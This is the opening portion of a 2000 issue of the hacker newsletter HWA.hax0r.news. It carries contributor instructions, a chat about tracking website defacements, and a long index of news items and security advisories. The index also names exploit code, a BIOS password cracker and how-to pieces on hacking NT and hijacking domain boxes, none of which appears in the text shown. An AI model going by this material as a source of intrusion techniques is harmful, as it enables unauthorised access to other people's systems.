[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA 2000=] Number 52 Volume 2 Issue 4 1999 Apr 2000 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== = "ABUSUS NON TOLLIT USUM" = ========================================================================== Editor: Cruciphux (cruciphux@dok.org) A Hackers Without Attitudes Production. (c) 1999, 2000 http://welcome.to/HWA.hax0r.news/ *** NEW WEB BOARD NOW ACTIVE *** http://discserver.snap.com/Indices/103991.html ========================================================================== ____ / ___|_____ _____ _ __ __ _ __ _ ___ | | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \ | |__| (_) \ V / __/ | | (_| | (_| | __/ \____\___/ \_/ \___|_| \__,_|\__, |\___| |___/ This is #52 covering Mar 13th to April 9th , 2000 ** 564 People are on the email notify list as of this writing. see note below in the Help Out! section re:distribution. ========================================================================== _ _ _ ___ _ _ | | | | ___| |_ __ / _ \ _ _| |_| | | |_| |/ _ \ | '_ \| | | | | | | __| | | _ | __/ | |_) | |_| | |_| | |_|_| |_| |_|\___|_| .__/ \___/ \__,_|\__(_) |_| WANT TO HELP? like what can I do? some answers to common questions, taken straight from IRC since, well why re-write it? :) ** Regarding the people on the email notification list with listbot. We now have a new listserv system setup with help from the generous people of the CCC (Chaos Computer Club) in Germany. If you haven't heard of CCC or don't know who they are you've been living under a rock ;) I am still working on the system it may or may not be ready for use as of this release, certainly it should be accessible for the next one, soon you will be able to receive the newsletter/zine directly delivered to your inbox (yay!). Stay tuned - Ed Early one night in #Hwa.hax0r.news ... Cruciphux: so do you really need help? cause I can start getting articles for ya if you want/need them yes damnit I do need help so what do I do.....look for articles...copy and paste them..... then hand them to you? what do you want to do? if you wanna do that sure, email em to me like that must have a source and or url though ok ppl always forget urls/sources and I can't print it without a source if u do and I haven't already put the info in you 'win' a Contributed by: space sn00zer! line under the article :) hehe and if yer good at it and get stuff I've never seen (like isn't on my excite newsbot list or on HNN etc) then you get promoted to 'staff' etc I should put this in there actually so ppl know what to expect ok cool and original articles? i'd kill for good original material heh stress on the 'good' but i'm not too picky if someone wants to make a fool of themselves in public. :-o so what kinda of articles.....anything? from programming to hacking....etc? pretty much heh technology, radio, science if it has a techno slant, and of course internet/web security and hacking related u know the drill yeah also just checkin... heh I need someone to do 'research' on web site defacements an adjunct to what attrition does like tell me about interesting defacements, I just print the sites list i get from attrition like how....person who defaced......??.......?? ohh ok theres a mailing list you can get on that tells you when sites get cracked thats a biggie i'm gonna be asking for in this issue print the 'good' defacements (shit with an angle) and track down/ identify defacers and groups etc ok cool:) with an eye towards possible profiles (group) and interviews (if they're doing something interesting) anything else? that looks good:) it doesn't seem that hard when you hear about people doing it k lemme know if you wanna do anything and lemme know what you want to do etc but now it sure seems harder than expected heh but it'll give me something to do at least well I do everything myself right now in free time and there are areas that i'd like to follow up on nad I just don't have the time so if ppl are willing to help i can keep putting out and hopefully things will get better too. well....I'll do anything you want me to do.....but following up on defacements and getting articles seems good right now otherwise i'd have to think about either downsizing or closing down and I don't want to do that really. ok good stuff local and 'small' stuff like whats going on at your schools computer lab ie: security policies is good angles for writing your own stuff too if that tickles your fancy doesn't have to be major world news *g* ok *** Quits: narq (I am free of all prejudices. I hate everyone equally) -=- And, sending in articles etc... Instead of emailing me this: (txt formatted to 80 cols) <-> Patching IE Security, Yet Again Security vulnerability affects the Win 2000 browser. Windows 2000 is finally here. And so is a patch for a security vulnerability in the Internet browser that is bundled with the new operating system. Microsoft issued the patch on Wednesday, the eve of the release of its much-delayed operating system. The bug, which Microsoft calls the Image Source Redirect vulnerability, makes it possible for a malicious Web site operator to read certain types of files on the computers of visitors using Internet Explorer versions 4.0, 4.01, 5.0, and 5.01. This means that the iteration of IE that is distributed with Windows 2000, version 5, also is affected by the bug. When you want to view a new page with a different domain than the one currently being viewed, a Web server sends the page to your IE browser window. IE then checks the server's permissions on the new page. The vulnerability makes it possible for a Web server to open a browser window to a file stored on the IE user's computer, and then switch to a page in the server's domain, gaining access to the contents of the user's files in the process, Microsoft says in a statement. Any data that can be seen is accessible only for a short period of time, and the Web site operator would need to know, or guess, the names and locations of files. The operator would also be able to view only file types that can be opened in a browser window, including .txt files, Microsoft says. http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html <-> :: YOU can go ahead and do some editing yourself and send it like this: :: <-> Patching IE Security, Yet Again ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by SugarKing Security vulnerability affects the Win 2000 browser. Source: PCworld url: http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html Windows 2000 is finally here. And so is a patch for a security vulnerability in the Internet browser that is bundled with the new operating system. Microsoft issued the patch on Wednesday, the eve of the release of its much-delayed operating system. The bug, which Microsoft calls the Image Source Redirect vulnerability, makes it possible for a malicious Web site operator to read certain types of files on the computers of visitors using Internet Explorer versions 4.0, 4.01, 5.0, and 5.01. This means that the iteration of IE that is distributed with Windows 2000, version 5, also is affected by the bug. When you want to view a new page with a different domain than the one currently being viewed, a Web server sends the page to your IE browser window. IE then checks the server's permissions on the new page. The vulnerability makes it possible for a Web server to open a browser window to a file stored on the IE user's computer, and then switch to a page in the server's domain, gaining access to the contents of the user's files in the process, Microsoft says in a statement. Any data that can be seen is accessible only for a short period of time, and the Web site operator would need to know, or guess, the names and locations of files. The operator would also be able to view only file types that can be opened in a browser window, including .txt files, Microsoft says. @HWA <-> :: Doesn't seem like much but saves me a bunch of work and I can plug it straight into the zine text... -=- Etc .. any other questions/comments/ideas/etc email me, you know the addy... -=- @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ # # @ The HWA website is sponsored by CUBESOFT communications I highly @ # recommend you consider these people for your web hosting needs, # @ @ # Web site sponsored by CUBESOFT networks http://www.csoft.net # @ check them out for great fast web hosting! @ # # # http://www.csoft.net/~hwa @ @ # @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ____ _ / ___| _ _ _ __ ___ _ __ ___(_)___ \___ \| | | | '_ \ / _ \| '_ \/ __| / __| ___) | |_| | | | | (_) | |_) \__ \ \__ \ |____/ \__, |_| |_|\___/| .__/|___/_|___/ |___/ |_| SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... =-----------------------------------------------------------------------= "If live is a waste of time and time is a waste of life, then lets all get wasted and have the time of our lives" - kf ____| _| | __| | __ \ _ \ __| | __| | | __/ | _____|_| _| _|\___|\__| Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news ************************************************************************** *** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed *** *** *** *** please join to discuss or impart news on the zine and around the *** *** scene or just to hang out, we get some interesting visitors you *** *** could be one of em. *** *** *** *** Note that the channel isn't there to entertain you its purpose is *** *** to bring together people interested and involved in the underground*** *** to chat about current and recent events etc, do drop in to talk or *** *** hangout. Also if you want to promo your site or send in news tips *** *** its the place to be, just remember we're not #hack or #chatzone... *** ************************************************************************** =--------------------------------------------------------------------------= _____ _ _ / ____| | | | | | | ___ _ __ | |_ ___ _ __ | |_ ___ | | / _ \| '_ \| __/ _ \ '_ \| __/ __| | |___| (_) | | | | || __/ | | | |_\__ \ \_____\___/|_| |_|\__\___|_| |_|\__|___/ =--------------------------------------------------------------------------= [ INDEX ] HWA.hax0r.news #52 =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. LEGAL & COPYRIGHTS .............................................. 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. THIS IS WHO WE ARE .............................................. ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= "The three most dangerous things in the world are a programmer with a soldering iron, a hardware type with a program patch and a user with an idea." - Unknown 01.0 .. GREETS ........................................................... 01.1 .. Last minute stuff, rumours, newsbytes ............................ 01.2 .. Mailbag .......................................................... 02.0 .. From the Editor................................................... 03.0 .. Clearing up a nasty screw up in issue #51, here's what happened... 04.0 .. HACK.CO.ZA AND A PLEA FOR HOSTING, +LOST EMAIL!................... 05.0 .. WebTV hit by "Melissa-Type" virus................................. 06.0 .. BlaznWeed interview, background info, exploit code and Sect0r..... 07.0 .. plusmail cgi exploit.............................................. 08.0 .. 2600 activism against the MPAA.................................... 09.0 .. Microsoft sends magazine full versions of Windows 2000............ 10.0 .. HNN:Mar 13th:Mexican Rebels Breached Pentagon Security ........... 11.0 .. HNN:Mar 13th:Online Guerrilla War Rages In Brazil ................ 12.0 .. HNN:Mar 13th:French Bank Card Algorithm Released ................. 13.0 .. HNN:Mar 13th:Still No Suspects in DDoS Attacks ................... 14.0 ,, HNN:Mar 13th:Japanese Pirates Busted ............................. 15.0 .. HNN:Mar 13th:Online Handles Impose Fear .......................... 16.0 .. HNN:Mar 13th:Vendors Still Making Insecure Software .............. 17.0 .. HNN:Mar 14th:Smart Card Inventor Issues Challenge ................ 18.0 .. HNN:Mar 14th:MPAA Continues to Harass In Fight Over DeCSS ........ 19.0 .. HNN:Mar 14th:Tracking Down Coolio................................. 20.0 .. HNN:Mar 14th: DOJ Launches Cybercrime Site ....................... 21.0 .. HNN:Mar 14th: China Relaxes Crypto Rules ......................... 22.0 .. HNN:Mar 14th:Stallman on UCITA ................................... 23.0 .. HNN:Mar 14th:What Exactly Does TRUSTe Mean Anyway?................ 24.0 .. HNN:Mar 15th: UCITA Sign By Governor in Virginia ................ 25.0 .. HNN:Mar 15th:RIP Goes Before Commons Today ....................... 26.0 .. HNN:Mar 15th:Security Patch Locks Out Users ...................... 27.0 .. HNN:Mar 15th:DNA Used for Steganography .......................... 28.0 .. HNN:Mar 15th:Bugging SAT Phones .................................. 29.0 .. HNN:Mar 15th:More and more EZines ................................ 30.0 .. HNN:Mar 16th:Army on Alert Over CyberAttack Fear ................ 31.0 .. HNN:Mar 16th:NASA Fears CyberAttack From Brazil .................. 32.0 .. HNN:Mar 16th:FBI Site Hit by DOS Again ........................... 33.0 .. HNN:Mar 16th:Teenager Arrested in Online Bank Scam ............... 34.0 .. HNN:Mar 16th:Former Employee Arrested For Attack On Company ...... 35.0 .. HNN:Mar 16th:PlayStation2 can Play US DVD ........................ 36.0 .. HNN:Mar 16th:ISTF Releases Security Recommendations .............. 37.0 .. HNN:Mar 17th:485,000 Credit Cards #s Stolen, Found on Gov Comp.... 38.0 .. HNN:Mar 17th:Brazil Gov Sites Suffering Under DDoS Attacks ....... 39.0 .. HNN:Mar 17th:Secret Service Harassing Bernie S Again ............. 40.0 .. HNN:Mar 17th: Secret Service to Work with Citicorp to Fight Fraud. 41.0 .. HNN:Mar 17th:Computer History Lecture Series ..................... 42.0 .. HNN:Mar 17th: Australian Police To Increase Online Presence ...... 43.0 .. HNN:Mar 17th:Apex DVD Defeats Region and Macrovision ............. 44.0 .. HNN:Mar 20th:First Malicious Code Direct at WebTV ................ 45.0 .. HNN:Mar 20th:Liberia Claims Attack In CyberWar ................... 46.0 .. HNN:Mar 20th:Judge Bans Anti-Filter Software ..................... 47.0 .. HNN:Mar 20th:We Spy To Prevent Bribes ............................ 48.0 .. HNN:Mar 20th:LAPD Tells Parody Site To Chill ..................... 49.0 .. HNN:Mar 20th:New Windows Worm Virus .............................. 50.0 .. HNN:Mar 20th:GNIT Now Freeware ................................... 51.0 .. HNN:Mar 20th:Online Criminals Labeled Boffins .................... 52.0 .. HNN:Mar 21st: Conflict In Kashmir Continues Online ............... 53.0 .. HNN:Mar 21st:Army Weapon Systems At Risk of Cyber Attack ......... 54.0 .. HNN:Mar 21st:2600 AU to Broadcast DeCSS .......................... 55.0 .. HNN:Mar 21st:CIA Monitoring Upheld by Court ...................... 56.0 .. HNN:Mar 21st:Make Your Reservations for RootFest Now! ............ 57.0 .. HNN:Mar 22nd:Cybercrime On The Rise .............................. 58.0 .. HNN:Mar 22nd:The Next Version of Windows Leaked .................. 59.0 .. HNN:Mar 22nd:Toronto Business Held For Extortion ................. 60.0 .. HNN:Mar 22nd:Is the Census Secure? ............................... 61.0 .. HNN:Mar 23rd:Insurance Co. Reveals Personal Info on Web .......... 62.0 .. HNN:Mar 23rd:Cisco Admits to Big Hole in PIX Firewall ............ 63.0 .. HNN:Mar 23rd:College To Offer Online Crime Fighting Courses ...... 64.0 .. HNN:Mar 23rd:Pittsburgh Gets Computer Crime Task Force ........... 65.0 .. HNN:Mar 23rd:Business May Be Protected Against FOIA .............. 66.0 .. HNN:Mar 23rd:Teenagers To Receive Deterrent Sentences ............ 67.0 .. HNN:Mar 24th:2600 Retains Big name Attorneys - Trial Date Set .... 68.0 .. HNN:Mar 24th:Max Vision Indicted in San Jose ..................... 68.1 .. KYZSPAM: More on Max Vision bust.................................. 69.0 .. HNN:Mar 24th:Koreans Attempt to Learn Security Secrets ........... 70.0 .. HNN:Mar 24th:Rack Mount Your iMac ................................ 71.0 .. HNS:Mar 24th:SECRETS STOLEN....................................... 72.0 .. HNS:Mar 24th:PATCH RELEASED BY TREND MICRO........................ 73.0 .. HNS:Mar 24th:PRIVACY ISSUES....................................... 74.0 .. HNS:Mar 24th:TARGETING ONLINE SCAMMERS............................ 75.0 .. HNS:Mar 24th:FEARS OF FREENET..................................... 75.1 ...(More) Anonymous net access aiding and abetting online criminals?. 76.0 .. HNS:Mar 24th:FEDERAL CIO NEEDED................................... 77.0 .. HNS:Mar 24th:DETERRENT SENTENCES.................................. 78.0 .. HNS:Mar 23rd:SENSITIVE DATA MADE PUBLIC........................... 79.0 .. HNS:Mar 23rd:ALTERING WEB SITES................................... 80.0 .. HNS:Mar 23rd:SECURITY BREACHES.................................... 81.0 .. HNS:Mar 23rd:ATTACK COSTS RISE.................................... 82.0 .. HNS:Mar 23rd:INDICTED FOR HACKING NASA SERVERS.................... 83.0 .. HNS:Mar 23rd:CALDERA SYSTEMS SECURITY ADVISORY.................... 84.0 .. HNS:Mar 23rd:REMOTE SECURITY MANAGEMENT........................... 85.0 .. HNS:Mar 23rd:"ANTI-ARAB" BUG...................................... 86.0 .. HNS:Mar 23rd:OFFICE 2000 PATCHES.................................. 87.0 .. HNS:Mar 23rd:SHARING INFORMATION.................................. 88.0 .. HNS:Mar 23rd:MONITORING WITH GOOD RESULTS......................... 89.0 .. HNS:Mar 23rd:CRIME FIGHTING LAB................................... 90.0 .. HNS:Mar 23rd:HUNTING CROATIAN PIRATES............................. 91.0 .. HNS:Patch available for OfficeScan vulnerability.................. 92.0 .. HNS:Gpm-root problems............................................. 93.0 .. HNS:Esafe Protect Gateway (CVP) problems.......................... 94.0 .. HNS:Bug in Apache project: Jakarta Tomcat......................... 95.0 .. HNS:MS SECURITY BULLETIN #18...................................... 96.0 .. HNS:S.A.F.E.R. Security Bulletin 000317........................... 97.0 .. HNS:Decon fix for con/con is vulnerable........................... 98.0 .. HNS:Cerberus Information Security Advisory........................ 99.0 .. HNS:Malicious-HTML vulnerabilities at deja.com.................... 100.0 .. HNS:Certificate Validation Error in Netscape Browsers............. 101.0 .. HNS:"OfficeScan DoS & Message Replay" Vulnerability............... 102.0 .. HNS:MS Security bulletin#17....................................... 103.0 .. HNS:Georgi Guninski security advisory #9.......................... 103.1 .. PSS:More MSIE crashing info by NtWakO............................. 104.0 .. HNS:Drive Mappings in Interactive Login........................... 105.0 .. HNS:DoS Attack in MERCUR WebView ................................. 106.0 .. HNS:Problem with Firewall-1....................................... 107.0 .. HNS:Freeze Distribution of IE 5.0, 5.0a, and 5.0b................. 108.0 .. HNS:Extending the FTP "ALG" vulnerability ........................ 109.0 .. FreeBSD-SA-00:08: Lynx overflows.................................. 110.0 .. Curador? BUSTED................................................... 111.0 .. PSS: Shaft Distributed DoS tool analysis Sven Dietrich............ 111.1 .. PSS: Shaft Node/Master analysis by Rick Wash & Jose Nazario....... 112.0 .. Wrapster, the Napster hack fires up the trading fires............. 113.0 .. AceFTP vulnerabilty by Armour..................................... 114.0 .. Pursuit Zine #1 (Aug 99).......................................... 115.0 .. SecurityFocus.com Newsletter 33................................... 116.0 .. You can get into trouble for hacking!............................. 117.0 .. SSHD v2.0.11< (old) Watch your version numbers!................... 118.0 .. BBC:"Outdoing the hackers"........................................ 119.0 .. HNN:Mar 27th:Curador Busted In Wales (See section 110.0 for more). 120.0 .. HNN:Mar 27th:Inferno Busted in Brazil ............................ 121.0 .. HNN:Mar 27th:OSU Students Accused of Stealing Bandwidth .......... 122.0 .. HNN:Mar 27th:PalmPilot WarDialer Released ........................ 123.0 .. HNN:Mar 27th:Mi5 Computer Stolen ................................. 124.0 .. HNN:Mar 27th:"HNN Wins Bad Ass Media Award"....................... 125.0 .. HNN:Mar 28th:French Ban Anonymous Internet........................ 126.0 .. HNN:Mar 28th:Canada Labeled Hot bed of Computer Terrorism ........ 127.0 .. HNN:Mar 28th:2600 Under Fire From NBC ............................ 128.0 .. HNN:Mar 28th:Takedown Debuts in France ........................... 129.0 .. HNN:Mar 28th:Mattel Buys Rights to CPHack ........................ 130.0 .. HNN:Mar 28th:Cyber Security Bill Passes Committee ................ 131.0 .. HNN:Mar 28th:Census Gets NSA to Look at Security ................. 132.0 .. HNN:Mar 28th:Icomlib 1.0.0 Final Released ........................ 133.0 .. HNN:Mar 28th:China Bans MP3s ..................................... 134.0 .. HNN:Mar 29th:MostHated to Plead Guilty ........................... 135.0 .. HNN:Mar 29th:FBI Wants New Laws to Make Their Work Easier ........ 136.0 .. HNN:Mar 29th:Banks Warned to Carefully Screen New Recruits ....... 137.0 .. HNN:Mar 29th:CPHack Was GPL'd, Mattel Left Holding the Bag........ 138.0 .. HNN:Mar 29th:White House Staffer Gives Away Phone Access Codes.... 139.0 .. HNN:Mar 29th:Another DVD Work Around on PlayStation 2............. 140.0 .. HNN:Mar 29th:Interview with Attrition Staff Posted................ 141.0 .. HNN:Mar 29th:The Unfairness of Computer Crime Sentences........... 142.0 .. HNN:Mar 29th:@tlanta Con to be Held this Weekend.................. 143.0 .. HNN:Mar 30th:MostHateD Busted for Burglary and Theft.............. 144.0 .. HNN:Mar 30th:Miramax Sued for Fugitive Game....................... 145.0 .. HNN:Mar 30th:Glassbook Shattered.................................. 146.0 .. HNN:Mar 30th:Yahoo Sued Over Piracy............................... 147.0 .. HNN:Mar 30th:Italian University Attacked by Brazilian Intruders... 148.0 .. HNN:Mar 30th:E-commerce Site Accuses Other of Intrusions.......... 149.0 .. HNN:Mar 30th:Australia To Protect Privacy of Works................ 150.0 .. HNN:Mar 31st:Y2Hack Goes on in Israel............................. 151.0 .. HNN:Mar 31st:Another Member of Inferno.br Identified in Brazil.... 152.0 .. HNN:Mar 31st:China Sets Up security Test Center................... 153.0 .. HNN:Mar 31st:Hackers Probe Physical Security of MIT............... 154.0 .. HNN:Mar 31st:DVD for Linux is Now Legal........................... 155.0 .. HNN:Mar 31st:Y2K Survivalists Come Out of Hiding.................. 156.0 .. CoreZine: New zine by lamagra of b0f.............................. 157.0 .. Paper:Some Extra Security In The Linux Kernel - Auditfile by {}... 158.0 .. Lets hack an NT box...how they are being defaced & how to secure.. 159.0 .. Hijack any .nu domain box (DoS/redirection/hijack)................ 160.0 .. The dreaded and most pheared return of the infamous GOAT!......... 161.0 .. b0f: exploit code to hang any linux machine by eth0............... 162.0 .. HNN:Apr 3rd:NIPC Issues Alert on New Self-Propagating 911 Script.. 163.0 .. HNN:Apr 3rd:Mixter Convicted of "Computer Sabotage" .............. 164.0 .. HNN:Apr 3rd:Forget Cookies, Worry About Cache .................... 165.0 .. HNN:Apr 3rd:Identity Theft On the Rise ........................... 166.0 .. HNN:Apr 3rd:Computer Crime Laws .................................. 167.0 .. HNN:Apr 4th:Computers Turned Into Bombs Via The Net............... 168.0 .. HNN:Apr 4th:GlassBook Knew of Vulnerabilities in King Book........ 169.0 .. HNN:Apr 4th:Alabama Man Charged With 5k In Damage to ISP.......... 170.0 .. HNN:Apr 4th:Federal Web Site Security Called Weak (Again)......... 171.0 .. HNN:Apr 4th:Germans Propose Strike Force For Net Defense.......... 172.0 .. HNN:Apr 4th:New Mags are Now Available............................ 173.0 .. HNN:Apr 5th:De Beers Releases Personal Info....................... 174.0 .. HNN:Apr 5th:CFP In Toronto........................................ 175.0 .. HNN:Apr 5th:Enigma Machine Stolen From Museum..................... 176.0 .. HNN:Apr 5th:Thailand Police Form Cyber Crime Panel................ 177.0 .. HNN:Apr 5th:40 Percent of Chinese Web Sites Attacked.............. 178.0 .. HNN:Apr 6th:DoubleClick Wins Privacy Award........................ 179.0 .. HNN:Apr 6th:ACLU Appeals CPHack Ruling............................ 180.0 .. HNN:Apr 6th:MPAA Attempts to Get Ruling Against Linking........... 181.0 .. HNN:Apr 6th:Enigma Suspect Busted................................. 182.0 .. HNN:Apr 6th:FBI and Privacy Advocates Square Off in Debate........ 183.0 .. HNN:Apr 6th:DDoS Attacks Contributed to Stock Market Losses....... 184.0 .. HNN:Apr 6th:History of the L0pht, Part 1.......................... 185.0 .. HNN:Apr 7th:Junger wins in Appeals Court - Code Declared Speech... 186.0 .. HNN:Apr 7th:Bullet to Scan Hard Drives of Web Site Visitors....... 187.0 .. HNN:Apr 7th:Links to Web Sites Illegal............................ 188.0 .. HNN:Apr 7th:British Companies Complacent.......................... 189.0 .. HNN:Apr 7th:Trio Becomes First Internet Crime Conviction for Hong Kong 190.0 .. HNN:Apr 7th:Census Afraid of Electronic Intrusion................. 191.0 .. HNN:Apr 7th:Hardware Key Logger Introduced........................ 192.0 .. HNN:Apr 7th:Napalm Issue 4........................................ 193.0 .. HNS:Apr 8th:NEW KIND OF SECURITY SCANNER.......................... 194.0 .. HNS:Apr 8th:WAYS TO ATTACK........................................ 195.0 .. HNS:Apr 7th:STOLEN ACCOUNTS....................................... 196.0 .. HNS:Apr 7th:JAILED FOR SIX MONTHS................................. 197.0 .. HNS:Apr 7th:PcANYWHERE WEAK PASSWORD ENCRYPTION................... 198.0 .. HNS:Apr 7th:NET PRIVACY TOOLS..................................... 199.0 .. HNS:Apr 7th:SECURITY ADDITIONS.................................... 200.0 .. HNS:Apr 7th:COOKIES............................................... 201.0 .. HNS:Apr 7th:SECURE E-MAIL SERVICE................................. 202.0 .. HNS:Apr 7th:ONLINE MUGGERS........................................ 203.0 .. HNS:Apr 6th:SURVEY BY DTI......................................... 204.0 .. HNS:Apr 6th:COMPUTER CODES PROTECTED.............................. 205.0 .. HNS:Apr 6th:RELEASED AFTER CODE MACHINE THEFT..................... 206.0 .. HNS:Apr 6th:CYBERPATROL BLOCK LIST................................ 207.0 .. HNS:Apr 5th:CRYPTO REGULATIONS.................................... 208.0 .. HNS:Apr 5th:GFI AND NORMAN TEAM UP................................ 209.0 .. HNS:Apr 5th:MASTERCARD OFFER VIRUS REPAIR SERVICE................. 210.0 .. HNS:Apr 5th:BUFFER OVERFLOWS...................................... 211.0 .. HNS:Apr 5th:PIRACY................................................ 212.0 .. HNS:Apr 5th:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER.................. 213.0 .. HNS:Apr 5th:GROUP APPEALS DVD CRYPTO INJUNCTION................... 214.0 .. HNS:Apr 5th:VIRUS BLOWS A HOLE IN NATO'S SECURITY................. 215.0 .. HNS:Apr 4th:FIGHT SPAM WITH SPAM.................................. 216.0 .. HNS:Apr 4th:REALPLAYER BUFFER OVERFLOW............................ 217.0 .. ISN:Mar 18th:Serbs hacked Britain's top-secret military computers. 218.0 .. March 15th: CRYPTOGRAM newsletter................................. 219.0 .. ISN:Mar 18th:Microsoft fends off hackers with Windows 2000........ 220.0 .. ISN:Feds Behind Recent Massive Web Hacking/Fwd.................... 221.0 .. ISN:Hacker 'Gatsby' Gets 18-Month Sentence........................ 222.0 .. ISN:Naval officer in hot water over policy........................ 223.0 .. ISN:Police to step up fight against e-crime....................... 224.0 .. ISN:Developers blasted on security................................ 225.0 .. ISN:"Islands in the clickstream, in defense of hacking"........... 226.0 .. ISN:Man angry at employer swallows own head....................... 227.0 .. ISN:Nasa division battles the hack from ipanema................... 228.0 .. ISN:Toys'R'Us..................................................... 229.0 .. ISN:Computer expert accused of hacking............................ 230.0 .. ISN:Disney and Miramax Sued for 'Hacking'......................... 231.0 .. ISN:Hacker posts own version of Gore's speech online.............. 232.0 .. ISN:Bennett leads cyber defense................................... 233.0 .. ISN:Hackers rue blurred line between curiosity, vandalism......... 234.0 .. ISN:Curador worked as e-commerce consultant....................... 235.0 .. ISN:White house official charged with spreading phone codes....... 236.0 .. ISN:Hackers hold conference in Israel............................. 237.0 .. ISN:Old school MIT stylie "hacking" still makes news?............. 238.0 .. ISN:US Census tests security...................................... 239.0 .. ISN:Visa program targets online fraud............................. 240.0 .. ISN:GAO lists security bargains................................... 241.0 .. ISN:DeBeers leaks customer info................................... 242.0 .. ISN:Cybersleuths want to hack bill of rights...................... 243.0 .. ISN:Third laptop gets lifted...................................... 244.0 .. ISN:Government suck rocks at busting computer criminals........... 245.0 .. CanSecWest/core00 Canadian Security Conf.......................... 246.0 .. PSS: BeOs Network DoS............................................. 247.0 .. PSS: TESO Security Advisory BinTec router weakness................ 248.0 .. b0f: namedscan.c.................................................. 249.0 .. PSS:Advisory: MailForm v1.91 for Windows 95 and NT 4.0............ 250.0 .. PSS: CGI rmp_query scanner........................................ 251.0 .. PSS: New ircii exploit............................................ 252.0 .. PSS:Cerberus Information Security Advisory (CISADV000330)......... 253.0 .. PSS:Win32 Realplayer 6/7 Buffer Overflow.......................... 254.0 .. ISS Security summary data sheet................................... 255.0 .. PSS: suse kreatecd root compromise................................ 256.0 .. PSS: irix object server remote root exploit....................... 257.0 .. PSS: Sun bind advisory............................................ 258.0 .. Cyberprofiling.................................................... 259.0 .. mIRC 5.7 Exploit code............................................. 260.0 .. Spaghetti proxy server exploit code............................... 261.0 .. schoolbus.c - netbus 1.7 client exploit crashes script kids box... 262.0 .. Protocol reverse engineering using Sub7 as an example............. 263.0 .. Essay:Elf Orin: The meaning of being a hacker..................... 264.0 .. Linux 2.2.x masq tunnel/hijack scenerio........................... 265.0 .. AWARD Bios password cracker .c source code........................ 266.0 .. Locked out? default BIOS/CMOS password list....................... =-------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in.ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Ha.Ha .. Humour and puzzles ............................................ Oi! laddie! send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... * COMMON TROJAN PORTS LISTING..................................... A.1 .. PHACVW linx and references...................................... A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site) A.3 ,, Mirror Sites list............................................... A.4 .. The Hacker's Ethic 90's Style.................................. A.5 .. Sources........................................................ A.6 .. Resources...................................................... A.7 .. Submission information......................................... A.8 .. Mailing lists information...................................... A.9 .. Whats in a name? why HWA.hax0r.news??.......................... A,10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again). A.11 .. Underground and (security?) Zines.............................. * Feb 2000 moved opening data to appendices, A.2 through A.10, probably more to be added. Quicker to get to the news, and info etc... - Ed =--------------------------------------------------------------------------= @HWA'99, 2000 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ | | ___ __ _ __ _| | | | / _ \/ _` |/ _` | | | |__| __/ (_| | (_| | | |_____\___|\__, |\__,_|_| |___/ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO 